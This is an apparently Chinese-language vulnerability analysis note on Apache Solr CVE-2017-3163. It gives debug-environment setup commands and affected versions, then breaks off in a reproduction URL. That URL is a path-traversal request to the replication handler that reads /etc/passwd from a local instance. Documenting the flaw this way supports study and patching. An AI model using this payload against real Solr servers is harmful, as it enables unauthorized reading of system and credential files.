solr漏洞分析–CVE-2017-3163
环境搭建
solr 6.4.0
java 1.8
solr 所有版本下载地址:http://archive.apache.org/dist/lucene/solr/
启动低版本启动,在example目录下:
java -Xdebug -Xrunjdwp:transport=dt_socket,address=10010,server=y,suspend=y -jar start.jar
高版本启动,bin目录下:
./solr.cmd -f -a “-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=10010” -port 8983 -s “./Solr/solr-6.4.0/example/example-DIH/solr”
IDEA:
复现
影响范围
- 1.4.0-6.4.0
低版本:
http://127.0.0.1:8983/solr/replication?command=filecontent&file=…/…/…/…/…/…/…/…/…/…/…/…/…/etc/passwd&wt=filestre